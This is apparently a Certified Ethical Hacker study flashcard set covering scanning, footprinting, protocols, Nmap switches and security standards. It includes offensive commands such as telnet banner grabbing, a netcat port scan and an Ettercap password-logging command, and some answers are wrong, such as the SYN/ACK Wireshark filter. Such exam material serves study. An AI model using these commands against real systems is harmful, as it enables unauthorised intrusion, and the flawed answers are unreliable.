Certified Ethical Hacker
CIA triangle
Confidentiality, integrity, and availability. These are the three aspects of security.
D)Smurf attack
Disabling directed broadcasts on all routers is a mitigation for which attack? A)MAC flood B)SYN flood C)Routing table poisoning D)Smurf attack
No
Does the PNZ hold users?
TCP/UDP 53
Domain Name System (DNS) Zone Transfer
boot record
GrayFish injects its malicious code into the ___ which handles the launching of Windows at each step
Source host
Hostname of the primary DNS server for the zone (there should be an associated NS record for this as well).
social engineering attacks
IP geolocation lookup tools such as IP2Location help to collect IP geolocation information about the target, which helps attackers launch ___ such as spamming and phishing
Echo Reply
ICMP Type 0
Time Exceeded
ICMP Type 11
Destination Unreachable
ICMP Type 3
Source Quench
ICMP Type 4
klibc-horsepill.patch horsepill_setopt horsepill_infect
Horse Pill has three important parts
IP2Location IP Location Finder IP Address Geographical Location Finder IP Location GeoIP Lookup Tool Geo IP Tool
IP Geolocation Lookup Tools
IP Identification Number TCP Flow Control Method
IP Spoofing Detection Techniques
Linkedin.com Pipl.com
Personal information--like residential address and phone of employees can be found where?
Phishing takes place using ____
TCP/UDP 389
Lightweight Directory Access Protocol (LDAP)
IP identification field TCP acknowledgement number TCP initial sequence number
TCP fields where data can be hidden are as follows:
distribute the payload covert channels
TCP parameters can be used by the attacker to ___ and to create ___
List Scan
This type of scan simply generates and prints a list of IPs/Names without actually pinging them
HTTP (TCP)
Port number 80
Scan result when a port is open (TCP Connect / Full Open Scan)
SYN --> <-- SYN + ACK ACK --> RST -->
SYN/FIN Scanning (IP Fragments)
SYN/FIN (Small IP Fragments) + Port (n) ---> <--- RST (if port is closed)
SRV
Service records
TCP/UDP 5060, 5061
Session Initiation Protocol (SIP)
monitor everything
Spytech SpyAgent allows you to ___ users do on your computer
Reconnaissance Scanning Gaining Access Maintaining Access Clearing Tracks
What are the five Hacking Phases?
Identify Security Objectives Application Overview Decompose Application Identify Threats Identify Vulnerabilities
What are the five sections of "threat modeling"?
Electronic Transaction and Code Sets Privacy Rule Security Rule National Identifier Requirements Enforcement
What are the five subsections of HIPAA?
preparation assessment conclusion
What are the three main phases of Pen Testing?
1) telnet www.certifiedhacker.com 80 (press Enter) 2) GET / HTTP/1.0 (press ENTER twice)
What command is used for Banner Grabbing using Telnet?
arp -d * or netsh interface ip delete arpcache
What commands on a Windows machine will clear the ARP cache?
Trojan
What is a common method of covertly installing a bot or a handler on a client computer?
Script kiddie
What is a derogatory term for a hacker who used other people's programs to attack networks and deface websites?
Low-level software that hides backdoor processes
What is a rootkit?
Rogue access point
What is an unauthorized access point called?
Session reconstruction
What is the process called when an IDS reassembles small packets before performing expression matching?
Application -- Layer 7 Presentation -- Layer 6 Session -- Layer 5
What layers of the OSI model does the PDU Data reside at?
C) It sets the home network as 202.78.55.6/24
What of the following is true regarding the Snort configuration file shown here: var HOME_NET 202.78.55.6/24 A) This rule configures Snort to alert on traffic from 202.78.55.6/24 B) This rule configures Snort to alert on traffic to 202.78.55.6/24 C) It sets the home network as 202.78.55.6/24 D) None of the above
Dictionary attack
What password cracking method uses an input list or file to discover the password?
Hybrid attack
What password cracking method uses word lists in combination with numbers and special characters?
Zenmap (Nmap's GUI Windows version)
What tool can be used to perform ping sweeps (ICMP Echo scanning)?
Dig (BIND 9)
What tool is native to Unix systems but available as a download for Windows systems, to test a DNS query and report the results?
Mirroring
What tool type allows you to download an entire website onto the local system?
D)Potential impact of the loss for each device
When IDS alerts report attacks on multiple devices, on which basis should the alerts be prioritized? A)Total number of alerts for each device B)Relative cost of each device C)Order in which they are recorded D)Potential impact of the loss for each device
It takes the prescribed action and stops evaluating the packet
When a router is examining a packet against an access control list and finds a traffic match, what action does the router take?
netsh advfirewall firewall show rule name=all
Which Windows Server 2012 command displays all rules within Windows Firewall?
Ethical hacker
Which kind of hacker only hacks for defensive purposes, so that he can think like a potential attacker?
A. APNIC
Your client's business is headquartered in Japan. Which regional registry would be the best place to look for footprinting information? A. APNIC B. RIPE C. ASIANIC D. ARIN E. LACNIC
Qualys FreeScan
for testing websites and applications for OWASP top risks and malware.
SEF (http://spl0it.org/projects/sef.html)
has great tools that can automate things such as extracting e-mail addresses out of websites and general preparation for social engineering. Also has ties into Metasploit payloads for easy phishing attacks.
Dumpster Diving
is looking for treasure in someone else's trash
PsInfo
list information about a system
script kiddie
unskilled, using other's scripts and tools
B. EDGAR Database
Which of the following is a good footprinting tool for discovering information on a publicly traded company's founding, history, and financial status? A. SpiderFoot B. EDGAR Database C. Sam Spade D. Pipl.com
A) Smartcard authentication
Which of the following is a mechanism associated with mandatory access control? A) Smartcard authentication B) User education C) Security policy D) Sign-in register
Session splicing
Which type of attack splits the attack payload into many small packets?
A. Implementing a split-horizon operation B. Restricting zone transfers
Brad is auditing an organization and is asked to provide suggestions on improving DNS security. Which of the following would be valid options to recommend? (Choose all that apply.) A. Implementing a split-horizon operation B. Restricting zone transfers C. Obfuscating DNS by using the same server for other applications and functions D. Blocking all access to the server on port 53
MAC flooding
Bob is attempting to sniff a wired network in his first pen test contract. He sees only traffic from the segment he is connected to. What can Bob do to gather all switch traffic?
Software used and its version Operating system used Sub-directories and parameters Filename, path, database field name, or query Scripting platform Contact details and CMS details
Browsing the target website may provide what kind of information?
OS Vulnerabilities
Buffer overflow vulnerabilities, bugs in operating system, unpatched operating system, etc.
Application Level Attacks
Buffer overflow, cross-site scripting, SQL injection, man-in-the-middle, session hijacking, denial-of-service, etc
True
Botnets are software applications that run automatic tasks over the Internet and often are coordinated to perform DDoS attacks? True or False
B. $207.50
Brad has done some research and determined a certain set of systems on his network fail once every ten years. The purchase price for each of these systems is $1200. Additionally, Brad discovers the administrators on staff, who earn $50 an hour, estimate five hours to replace a machine. Five employees, earning $25 an hour, depend on each system and will be completely unproductive while it is down. If you were to ask Brad for an ALE on these devices, what should he answer with? A. $2075 B. $207.50 C. $120 D. $1200
Active Banner Grabbing
-Specially crafted packets are sent to remote OS and the responses are noted -The responses are then compared with a database to determine the OS -Response from different OSes varies due to differences in TCP/IP stack implementation
Parallel, normal speed scan
-T3
Parallel, fast scan
-T4
XML output
-oX
DNS scan (list scan)
-sL
NULL scan
-sN
Protocol scan
-sO
Ping scan
-sP
RPC scan
-sR
Windows scan
-sW
Hping2 / Hping3
1) Command line network scanning and packet crafting tool for the TCP/IP protocol 2) It can be used for network security auditing, firewall testing, manual path MTU discovery, advanced traceroute, remote OS fingerprinting, remote uptime guessing, TCP/IP stacks auditing, etc.
MarketWatch The Wall Street Transcript Alexa Euromonitor Experian SEC Info The Search Monitor
Competitive Intelligence - What Are the Company's Plans? What websites?
ABI/INFORM Global SimilarWeb AttentionMeter Copernic Tracker SEMRush
Competitive Intelligence - What Expert Opinions Say About the Company? What websites?
D. Cease testing immediately and contact authorities.
During an assessment, your pen test team discovers child porn on a system. Which of the following is the appropriate response? A. Continue testing and report findings at out-brief B. Continue testing but report findings to the business owners. C. Cease testing immediately and refuse to continue work for the client. D. Cease testing immediately and contact authorities.
A)To ensure critical data is not changed on the system
During security testing, what is the purpose of analyzing the interrupts within a piece of software? A)To ensure critical data is not changed on the system B)To test the access controls C)To validate the design D)To determine if secure coding principles were followed
HINFO
Host information record includes CPU type and OS
Redirect
ICMP Type 5
Echo Request
ICMP Type 8
Banner Grabbing Tools
ID Serve Netcraft Netcat Telnet
-Send SYN + ACK packet to the zombie machine to probe its IPID number -Every packet on the Internet has a fragment identification number (IPID), which increases every time a host sends an IP packet -Zombie not expecting a SYN + ACK packet will send RST packet, disclosing the IPID -Analyze the RST packet from zombie machine to extract IPID
IDLE Scan: Step 1
-Send SYN packet to the target machine (port 80) spoofing the IP address of the "zombie" -If the port is open, the target will send SYN+ACK packet to the zombie and in response zombie sends RST to the target -If the port is closed, the target will send RST to the "zombie" but zombie will not send anything back
IDLE Scan: Step 2
-Probe "zombie" IPID again
IDLE Scan: Step 3
Prudent Policy
It provides maximum security while allowing known but necessary dangers. It blocks all services and only safe/necessary services are enabled individually; everything is logged
ISO/IEC 27001:2013
It provides requirements for creating, maintaining, and improving organizational IS (Information Security) systems.
Reduce Focus Area
It reduces the attacker's focus area to a specific range of IP addresses, networks, domain names, remote access, etc.
SSH
Jennifer is a system administrator who is researching a technology that will secure network traffic from potential sniffing by unauthorized machines. Jennifer is not concerned with the future impact on legitimate troubleshooting. What technology can Jennifer implement?
tcpdump -w capture.log
Jenny is using tcpdump to capture traffic on her network. She would like to save the capture for later review. What command can she use?
A reverse ARP request maps to two hosts
MAC spoofing applies a legitimate MAC address to an unauthenticated host, which allows the attacker to pose as a valid user. Based on your understanding of ARP, what would indicate a bogus client?
directory structure
Mirroring an entire website onto the local system enables an attacker to browse the website offline; it also assists in finding ___ and other valuable information from the mirrored copy without multiple requests to the web server.
illegal access
Misconfiguration vulnerabilities affect web servers, application platforms, databases, networks, or frameworks that may result in _____ or possible owning of the system
IPv4/IPv6 domain names
NetScan Tools Pro lists ____ addresses, hostnames, _____, email addresses, and URLs automatically or with manual tools
map of the target network
Network range information assists attackers in creating a ______
intelligence gathering
Network scanning is one of the components of ___ an attacker uses to create a profile of the target organization
Information gathering Sniffing and eavesdropping Spoofing Session hijacking and Man-in-the-Middle attack DNS and ARP Poisoning Password-based attacks Denial-of-Service attack Compromised-key attack Firewall and IDS attacks
Network threats
TCP/IP nodes and routes
NetworkView discovers _____ using DNS, SNMP, ports, NetBIOS, and WMI
DIG DNSWatch myDNSTools DomainTools Professional Toolset DNS Query Utility DNS Records DNS Lookup DNSData View DNS Query Utility
DNS Interrogation Tools
http://www.dnsstuff.com http://network-tools.com
DNS Interrogation Tools
Zone transfers
DNS port 53 TCP is used by what?
Name lookups
DNS port 53 UDP is used by what?
creates a back channel
DNS tunneling ___ to access a remote server and applications
port 53 (TCP and UDP)
DNS uses what port?
B)It detects which computers are online.
During a recent review of the events on your company's network, you discover that an attacker used Nmap to perform a ping sweep on your company's network. Which statement is true regarding this type of scan? A)It checks for open UDP ports. B)It detects which computers are online. C)It determines IP trust-based relationships between hosts. D)It sets the FIN, URG and PUSH flags in the TCP header.
Does not work on IPv6
Does NetBIOS name resolution work on IPv6?
No does not work
Does an XMAS scan work against Microsoft Windows?
(TTL) open
In an ACK flag probe using the TTL method, if the TTL of the RST packet is less than 64, the port is ___.
(Window) open
In an ACK flag probe using the Window method, if the window size of the RST packet is anything other than zero, the port is ___.
(Full Connect) SYN/ACK RST
In a full connect scan, open ports respond with ___ and closed ports respond with a ___.
(Stealth) SYN/ACK RST
In a stealth scan, open ports respond with ___ and closed ports respond with ____.
The value of the next sequence number in the packet being acknowledged or replied to
During a TCP handshake, which value is used for the acknowledgement number in a reply packet?
RST
During a Xmas tree scan what indicates a port is closed?
C)External interface of DMZ firewall
During a penetration test, a tester conducts the following scan: hping3 -A 209.15.13.134 -p 80 You receive back no response, indicating the port is filtered. Which type of network interface is being scanned? A)Internal interface of DMZ firewall B)Internal interface of public web server C)External interface of DMZ firewall D)External interface of public web server
A)IT security analyst
During a risk assessment, which of the following roles is responsible for providing the security architecture to the risk assessor? A)IT security analyst B)Business manager C)Facilities manager D)CIO
D)30 hosts in 8 subnets
You are performing a ping sweep to determine the live hosts running in network 204.17.5.0/27. How many possible hosts will be pinged? A)14 hosts in 16 subnets B)126 hosts in 2 subnets C)62 hosts in 4 subnets D)30 hosts in 8 subnets E)254 hosts in 1 subnet
A)N-tier
You have a front-end web server, an application server, and a database server that each perform a single and unique role in a group. What BEST describes this architecture? A)N-tier B)Service oriented architecture C)Separation of duties D)Dual control
Agentless auditing Compliance checks Content audits Customized reporting High-speed vulnerability discovery In-depth assessments Mobile device audits Patch management integration Scan policy design and execution
What are some features of Nessus?
-Network topology discovery and mapping -Export network diagrams to Visio -Network mappings for regulatory compliance -Multi-level network discovery -Auto-detect changes to network topology
What are some features of Network Topology Mapper?
Network vulnerabilities Open ports and running services Application and services vulnerabilities Application and services configuration errors
What are some things that Vulnerability Scanning checks for?
Website-Watcher Change Detection Follow That Page Page2RSS Watch That Page Check4Change OnWebChange Infominder TrackedContent Websnitcher Update Scanner
What are some tools for Monitoring Web Updates?
Google Earth Google Maps Wikimapia National Geographic Maps Yahoo Maps Bing Maps
What are some tools for finding the geographical location?
SiteDigger (www.mcafee.com) MetaGoofil (www.edge-security.com)
What are some tools to make Google hacking more powerful?
C)Automated vulnerability assessment tool
What is Nessus? A)Hacking tool that targets Web servers B)Security scanner that discovers hosts and services on a computer network C)Automated vulnerability assessment tool D)Wireless network detector, sniffer, and intrusion detection system
nmap -P cert.org/24 152.148.0.0/16
What is an Nmap command for ICMP Echo Scanning?
A way to reveal vulnerabilities
What is a vulnerability scan designed to provide to those executing it?
Identify a user
What is an SID used to do?
A)Covert channel
What is an illegitimate transfer of information between processes on a system or systems on a network? A)Covert channel B)Out of band C)API D)Privilege escalation
C. A UDP port scan of ports 1-1024 on a single address
What is being attempted with the following command? nc -u -v -w2 192.168.1.100 1-1024 A. A full connect scan on ports 1-1024 for a single address B. A full connect scan on ports 1-1024 for a subnet C. A UDP port scan of ports 1-1024 on a single address D. A UDP scan of ports 1-1024 on a subnet
Target of evaluation (TOE)
What is being tested.
Frames
What is built in the Data Link Layer?
Trojan horse attack
What is it called when an attacker attempts to steal passwords through an innocent looking application?
Each header field is 16 bits in length: Source Port - Destination Port Length - Checksum Data
What is the UDP datagram structure?
172.17.255.255
What is the broadcast address in the 172.17.0.0/16 network?
telnet <website name> 80
What is the command to retrieve header information from a web server using Telnet?
B)2048 bits
What is the current recommended RSA key length for a PKI? A)8192 bits B)2048 bits C)4096 bits D)1024 bits
Network, software or service available outside of normal internet traffic and search engines
What is the darknet?
An egg
What is the data payload called when ADMutate is in use?
get proper authorization
What is the first step in Pen Testing?
Footprinting
What is the first step in information gathering and provides a high-level blueprint of the target system or network?
A)Protect you when you are off the LAN
What is the main advantage of a host-based Intrusion Detection/Protection System (IDS/IPS) over a network-based solution? A)Protect you when you are off the LAN B)Requires port scanning C)Requires less training D)Resides at the perimeter of the network
Heap
What is the name for dynamic memory space that, unlike the stack, doesn't rely on sequential ordering or organization?
Netcat
What is the name of a simple UNIX utility that reads and writes data across network connections using either TCP or UDP?
Open Web Application Security Project (OWASP)
What is the name of the online community dedicated to web application security, known for their top 10 list of web vulnerabilities?
Scanning
What is the next step after footprinting a target?
B) The ethical hacker has authorization to proceed from the target owner
What is the primary difference between an ethical hacker and a cracker? A) The ethical hacker points out vulnerabilities but does not exploit them B) The ethical hacker has authorization to proceed from the target owner C) The ethical hacker does not use the same tools and techniques D) The ethical hacker does not have financial motivation
Hashing
What is the process of deriving a value that can be used to determine if any changes have been made in a message called?
A)It takes a message of arbitrary length as input and produces a 128-bit hash value output.
What is the purpose of MD5? A)It takes a message of arbitrary length as input and produces a 128-bit hash value output. B)It takes a message of up to 1 MB in size and produces a 128-bit hash value output. C)It takes a message of up to 1 MB in size and produces a 160-bit hash value output. D)It takes a message of arbitrary length as input and produces a 160-bit hash value output.
It evaluates how well a company adheres to its stated security policy
What is the purpose of a security audit?
It validates their correct application
What is the purpose of conducting security assessments on network resources?
To verify that files have not been changed or altered
What is the purpose of integrity hashes?
C)To automate SQL injection attacks
What is the purpose of using the Mole tool? A)To extract (reverse engineer) data points from a graph B)To read and write data across network connections C)To automate SQL injection attacks D)To recover passwords in a Windows system
C. SYN/ACK
What is the second step in the TCP three-way handshake? A. SYN B. ACK C. SYN/ACK D. ACK-SYN E. FIN
nslookup [-options] {hostname | [server]}
What is the syntax for nslookup?
N-tier
What is the term for a design with a front-end server, an application server, and a database server that as a group perform a single and unique role?
Threat agent
What is the term for a person who attempts to exploit a threat?
False positive
What is the term for a system incorrectly preventing traffic or actions that should be allowed?
Mantrap
What is the term for a two-door system with a small room between them which allows for visual verification of each person entering a building?
Threat
What is the term for a vulnerability that exists that has the potential to be exploited, as compared to a vulnerability that exists but has no chance of being exploited?
Vulnerability
What is the term for a weakness or error that can lead to a compromise?
Covert channel
What is the term for any method used to bypass multi-level security solutions?
OSSTMM (Open Source Security Testing Methodology Manual)
What is the widely-adopted, peer-reviewed manual for operational security testing and analysis?
U.S. Computer Security Incident Response Team (CSIRT)
What organization acts as a single point of contact for reporting security incidents in the US?
gaining access phase
In what phase of ethical hacking are true attacks leveled against the targets enumerated?
maintaining access
What phase of ethical hacking makes use of Trojans, rootkits, or any number of other methods?
gaining access
In what phase of ethical hacking would you deliver a buffer overflow or SQL injection against a web application?
scanning and enumeration phase
In what phase of ethical hacking would you run a ping sweep, a network mapper, or a vulnerability scanner?
covering tracks
In what phase of ethical hacking do attackers attempt to conceal their success and avoid detection by security professionals?
maintaining access phase
In what phase of ethical hacking do hackers attempt to ensure they have a way back into the machine or system they've already compromised?
Regional Internet Registries (RIRs)
What provides overall management of the public IP address space within a given geographic region?
Upgrade the kernel immediately
What should you do when no known workaround exists to eliminate a Linux kernel vulnerability?
ARP poisoning
What technique funnels all traffic back to a single client, allowing sniffing from all connected hosts?
Outside affiliate
What threat type is a non-trusted individual who uses open access to gain access to an organization's resources?
Insider affiliate
What threat type is a spouse, friend, or even client of an employee who uses the employee's credentials to gain access?
Pure insider
What threat type is an employee with all the rights and access associated with being employed by the company?
Encryption, integrity, and non-repudiation
What three protections does public key cryptography provide?
Absorb Add more services Shut down services
What three ways can you handle a DDoS attack?
CyberGhost
What tool allows you to protect your online privacy, surf anonymously, and access blocked or censored content? It hides your IP and replaces it with one of your choice, allowing you to surf anonymously.
TOR
What tool allows you to protect your privacy and defend yourself against network surveillance and traffic analysis?
GFI LanGuard
What tool assists in asset inventory, change management, risk analysis, and proving compliance?
Website Watcher (http://aignes.com)
What tool can be used to check web pages for changes, automatically notifying you when there's an update?
Colasoft's Packet Builder
What tool can be used to craft segments and manipulate flags? This tool can also create fragmented packets to bypass IDS (and possibly firewalls).
Netcraft http://www.netcraft.com
What tool can you use to find a company's restricted URLs?
ARIN
What tool can you use to find network ranges for a target and/or contact information?
whois
What tool can you use to query registries and return information such as domain ownership, address, locations, and phone numbers?
OpenStego
What tool can do the following? Data Hiding - It can hide any data within a cover file (e.g. images). Watermarking - Watermarking files (e.g. images) with an invisible signature; it can be used to detect unauthorized file copying.
Shodan
What tool is designed to help you find specific types of computers (routers, servers, and so on) connected to the Internet?
The next sequence number and acknowledgment number in an exchange
What two values must a hacker guess or estimate to hijack a TCP session?
ARP poisoning
What type of attack changes the IP address to MAC address mappings on two other devices, such that the two devices send frames to the attacker when they think they are sending frames to one another?
Brute force password attack
What type of attack is mitigated by an account lockout policy?
Denial of Service (DoS)
What type of attack overwhelms a target with requests that utilize all resources on the target?
Social engineering
What type of attack uses nontechnical means to obtain information useful in a network attack?
Two-factor or multi-factor authentication
What type of authentication is being performed when a USB token and retina scan are both required?
Circuit level gateway
What type of firewall monitors the TCP handshake between packets to determine whether a requested session is legitimate?
Personal firewall software
What type of software is ZoneAlarm?
An automatic SQL Injection exploitation tool
What type of tool is Mole?
SNMPv3
What version of SNMP encrypts the community strings?
SNMPv1
In what version of SNMP are the strings sent in clear text?
Microsoft Baseline Security Analyzer (MBSA)
What vulnerability tool is specifically designed to locate potential exploits in the products from Microsoft?
Domain Name System Security Extensions (DNSSEC)
What was created to protect against DNS poisoning?
Truth in Caller ID Act
What was started in 2010 and states a person who knowingly transmits misleading caller ID information can be hit with a $10,000 fine per incident?
WEP
What wireless protocol has been compromised because of the way it implements the RC4 algorithm?
Telnet request to port 80 on a machine
What would the below output represent? C:\telnet 192.168.1.15 80 HTTP/1.1 400 Bad Request Server: Microsoft - IIS/5.0 Date: Sat, 29 Jan 2011 11:14:19 GMT Content - Type: text/html Content - Length: 87 <html><head><title>Error</title></head> <body>The parameter is incorrect. <body><html> Connection to host lost.
To disguise the attack signature for the purpose of evading a signature based IDS
What would you use the tool ADMutate for?
Intranet Zone
What zone is a controlled zone with no heavy restrictions?
Internet DMZ
What zone is controlled, as it provides a buffer between internal networks and the Internet?
Production Network Zone
What zone is a restricted zone, as it strictly controls direct access from uncontrolled networks?
Management Network Zone
What zone is a secured zone with strict policies?
Internet Zone
What zone is uncontrolled, as it is outside the boundaries of an organization?
It continues to examine the packet after a match is found to identify any additional rules the packet might match.
When an IDS or IPS is examining a packet against an access control list and finds a traffic match, what action does the device take?
Closed Open
When doing an IDLE scan if the IPID increments by 1 then the port is ____. If the IPID increments by 2 then the port is _____.
Employee details Organization's website Company directory Location details Address and phone numbers Comments in HTML source code Security policies implemented Web server links relevant to the organization Background of the organization News articles Press releases
When footprinting what organization's information is collected?
User and group names System banners Routing tables SNMP information System architecture Remote system type System names Passwords
When footprinting what system information is collected?
Domain name Internal domain names Network blocks IP addresses of the reachable systems Rogue websites/private websites TCP and UDP services running Access control mechanisms and ACL's Networking protocols VPN Points IDSes running Analog/digital telephone numbers Authentication mechanisms System enumeration
When footprinting what type of Network information is collected?
B)Ignore the risk
When handling residual risk, which of the following is NOT an acceptable approach? A)Apply additional controls B)Ignore the risk C)Transfer the risk D)Accept the risk
spoofed address attacker's real address
When someone uses IP spoofing and the victim replies to the address, the reply goes back to the _____ and not to the _____
Keywords
When talking to a victim, using ____ can make an attack easier.
SNMP GET SNMP SET
When the SNMP management station asks a device for information, the packet is known as an ____. When it asks the agent to make a configuration change, the request is an ____ request.
D)Encrypt with the server's public key
When the client is creating a session key for an SSL connection, how does the client handle the resulting key? A)Encrypt with the client's public key B)Encrypt with the server's private key C)Encrypt with the client's private key D)Encrypt with the server's public key
D)Scanned port is not filtered
When you are performing ACK flag scanning, what does it mean if you receive a response of RST? A)Scanned port is open B)Scanned port is closed C)Scanned port is filtered D)Scanned port is not filtered
C:\Windows\System32\Config\SAM
Where are the passwords for the SIDs and RIDs located on Windows machines?
Market Watch The Wall Street Transcript Lipper Marketplace Euromonitor Experian SEC Info The Search Monitor
Where can you go to find what the company's plans are, for use in competitive intelligence?
ABI/INFORM Global Compete Pro AttentionMeter Copernic Tracker Jobitorial SEMRush
Where can you go to find what expert opinions say about the company, for use in competitive intelligence?
EDGAR Database Hoovers LexisNexis Business Wire
Where can you go to find when the company began and how it developed, for use in competitive intelligence?
D) c:\windows\system32\config\
Where is the SAM file located in Windows 7? A) c:\system32\ B) c:\system32\config\ C) c:\windows\system32\ D) c:\windows\system32\config\
C. EIP
Which CPU register points to the next command the CPU should execute? A. TDM B. NIL C. EIP D. EDI E. EBP
Protection profile
Which Common Criteria component defines a standard set of security requirements for a specific type of product?
Evaluation Assurance Level (EAL)
Which Common Criteria component defines how thoroughly the product is tested?
D) NS
Which DNS record type indicates the organization's DNS servers dedicated to answering requests? A) PTR B) SOA C) MX D) NS
C) MX
Which DNS record type indicates the organization's e-mail server? A) PTR B) SOA C) MX D) DX
C. A
Which DNS record type maps an IP address to a hostname and is used most often for DNS lookups? A. NS B. MX C. A D. SOA
Land
Which DoS attack sends traffic to the target with a spoofed IP of the target itself? Land Smurf Teardrop SYN flood
D. allintitle:SQL version
Which Google hack would display all pages that have the words SQL and Version in their title? A. inurl:SQL inurl:version B. allinurl:SQL version C. intitle:SQL inurl:version D. allintitle:SQL version
D) allintitle: SQL version
Which Google hack would display all pages that have words "SQL" and "Version" in their titles? A) inurl: SQL inurl: version B) allinurl: SQL version C) intitle: SQL inurl: version D) allintitle: SQL version
Type 11
Which ICMP message type/code indicates the packet could not arrive at the recipient due to exceeding its time to live? A. Type 11 B. Type 3, Code 1 C. Type 0 D. Type 8
C)Session reconstruction
Which IDS technique helps to mitigate session splicing attacks? A)Expression matching B)Session fragmentation C)Session reconstruction D)Whitelisting
802.2
Which IEEE standard describes Logical Link Control (LLC)?
802.1Q
Which IEEE standard describes VLAN encapsulation?
802.11
Which IEEE standard describes Wireless Fidelity (WiFi)?
802.1x
Which IEEE standard describes authentication?
127.0.0.1 or the loopback address
Which IP address does a computer use to refer to itself?
B)27006
Which ISO 27000 standard describes audits and certifications? A)27001 B)27006 C)27002 D)27005
showmount
Which Linux enumeration command displays all the shared directories on the machine?
rpcinfo rpcclient
Which Linux enumeration command provides information on RPC in the environment?
finger
Which Linux enumeration command provides information on the user and host machine?
-sO
Which Nmap switch includes protocols in the output?
-sT
Which Nmap switch performs a normal connect scan?
-sS
Which Nmap switch performs a normal stealth scan?
-sP
Which Nmap switch performs a ping scan?
-sX
Which Nmap switch performs an inverse Xmas scan?
B) FIN
Which TCP flag brings communications to an orderly close? A) ACK B) FIN C) PSH D) SYN E) RST
B. PSH
Which TCP flag instructs the recipient to ignore buffering constraints and immediately send all data? A. URG B. PSH C. RST D. BUF
cacls.exe
Which Windows command line tool can be used to assign, display, or modify ACLs (Access Control Lists) to files or folders?
ip.addr == 192.168.1.1
Which Wireshark filter displays only traffic from 192.168.1.1?
Diffie-Hellman
Which algorithm uses a shared private key to exchange public keys?
DNS poisoning
Which attack is based on changing the IP address to host name mapping?
C)TCP session hijacking
Which attack occurs at the Transport layer of the OSI model? A)ICMP flooding B)Telnet DoS attack C)TCP session hijacking D)MAC spoofing
DDoS attacks
Which attack uses a multitude of infected computers known as zombies or bots?
D)Trojan malware
Which attack vector commonly uses covert channels? A)Spear phishing B)SQL injection C)Network sniffing D)Trojan malware
Replay attacks
Which attacks can be mitigated by time stamps and nonce?
A) CACLS.exe
Which command can be used to assign, display, or modify the file and folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe
A) CACLS.exe
Which command can be used to assign, display, or modify the folder ACLs? A) CACLS.exe B) FPORT.exe C) CLACS.exe D) PERM.exe
A. ./snort -dev -l ./log
Which command puts Snort into packet logger mode? A. ./snort -dev -l ./log B. ./snort -v C. ./snort -dev -l ./log -h 192.168.1.0/24 -c snort.conf D. None of the above
Switched Port Analyzer (SPAN) feature
Which configuration on a switch sends all traffic to the port on which the IDS is located?
D)Circuit level gateway
Which device normally operates at Layer 5 of the OSI model? A)Packet filtering firewall B)Proxy server C)Switch D)Circuit level gateway
C)Firewalls
Which device uses rule-based access control? A)Servers B)Clients C)Firewalls D)Switches
NTFS
Which file system is susceptible to an attack that uses alternative data streams?
B) tcp.flags==0x18
Which filter should be used to show all SYN/ACK packets? A) tcp.flags==0x02 B) tcp.flags==0x18 C) tcp.flags==0x12 D) tcp.flags==0x10
D) Traceroute
Which footprinting tool uses ICMP to provide information on pathways between senders and recipients? A) Whois B) EDGAR C) NMAP D) Traceroute
The impact on performance
Which impact needs to be considered before implementing a security audit?
Common Criteria
Which international standard establishes a baseline of confidence in the security functionality of IT products, and includes protection profiles and evaluation assurance levels?
23
Which is the port number used for Telnet?
C)Does not require managing server services
Which is true of PGP? A)Requires a licensing fee B)Provides a server-side scripting language C)Does not require managing server services D)Provides only privacy for data
A virus is malware A virus replicates with user interaction
Which is/are a characteristic of a virus?
Client's private key
Which key is required to decrypt a message encrypted by a client's public key?
Server's public key
Which key is required to decrypt a message that was encrypted with a server's private key?
Grey hat
Which kind of hacker believes in full disclosure, with or without permission?
White hat
Which kind of hacker hacks with permission?
Black hat
Which kind of hacker hacks without permission?
A)Single factor authentication
Which kind of security mechanism would require a retina scan and a fingerprint scan as logon credentials? A)Single factor authentication B)Multi-factor authentication C)Two-factor authentication D)Biometric authorization
C)FC-0 D)FC-1
Which layers of the Fibre Channel stack are replaced with Ethernet when using FCoE? (Choose all that apply.) A)FC-4 B)FC-3 C)FC-0 D)FC-1 E)FC-2
Switch
Which network device can block sniffing to a single network collision domain, create VLANs, and make use of SPAN ports and port mirroring?
D. TOE
Which of the following Common Criteria processes refers to the system or product being tested? A. ST B. PP C. EAL D. TOE
B)Hidden SSID E)MAC address filters
Which of the following WLAN security measures could be easily defeated with the use of a wireless sniffer? (Choose all that apply.) A)802.11i B)Hidden SSID C)EAP-TTLS D)WPA2 Enterprise E)MAC address filters
C) ip.addr=192.168.0.100 and tcp.flags.syn
Which of the following Wireshark filters is valid for three way handshake details originating from 192.168.0.100? A) ip==192.168.0.100 and tcp.syn B) ip.addr=192.168.0.100 and syn=1 C) ip.addr=192.168.0.100 and tcp.flags.syn D) ip.equals 192.168.0.100 and syn.equals on
A) Detach from the console and log all collected passwords to a file
Which of the following accurately describes the intent of the command Ettercap -NCLzs --quiet A) Detach from the console and log all collected passwords to a file B) Provide a list of all hosts on the subnet C) Begin a ping sweep D) Provide a list of all listening ports and who is connected to your machine
D)Notifies of threats based on active attack signatures
Which of the following actions does vulnerability scanning NOT perform? A)Scans for open ports and running services B)Utilizes automated processes to gather information C)Operates proactively to locate issues D)Notifies of threats based on active attack signatures
B)Sending FTP traffic through a firewall that blocks ports 20 and 21
Which of the following actions becomes possible using HTTP tunneling? A)Determining the open ports on server B)Sending FTP traffic through a firewall that blocks ports 20 and 21 C)Identifying a hidden SSID D)Stealing a secure cookie from a web session
Netcraft (Banner Grabbing)
Reports a site's operating system, web server, and netblock owner together with, if available, a graphical view of the time since last reboot for each of the computers serving the site
This flag is set during initial communication
SYN (Synchronize)
Port is closed (Stealth Scan [Half-open scan])
SYN --> <-- RST
Scan result when a port is closed (TCP Connect / Full Open Scan)
SYN --> <-- RST
Port is open (Stealth Scan [Half-open scan])
SYN --> <-- SYN + ACK RST -->
TCP Session Establishment (Three-way Handshake)
SYN --> <-- SYN+ACK ACK -->
IDLE Scan: Step 2 (Port Open)
(attacker) --> SYN packet to port 80, spoofing the zombie's IP address --> (target); (target) --> SYN+ACK packet --> (zombie); (zombie) --> RST packet (IPID=31338) --> (target)
B. Assessment
Sally is a member of a pen test team newly hired to test a bank's security. She begins searching for IP addresses the bank may own by searching public records on the Internet. She also looks up news articles and job postings to discover information that may be valuable. What phase of the pen test is Sally working? A. Preparation B. Assessment C. Conclusion D. Reconnaissance
C) Hybrid attacks use a word list, substituting numbers and symbols in common places
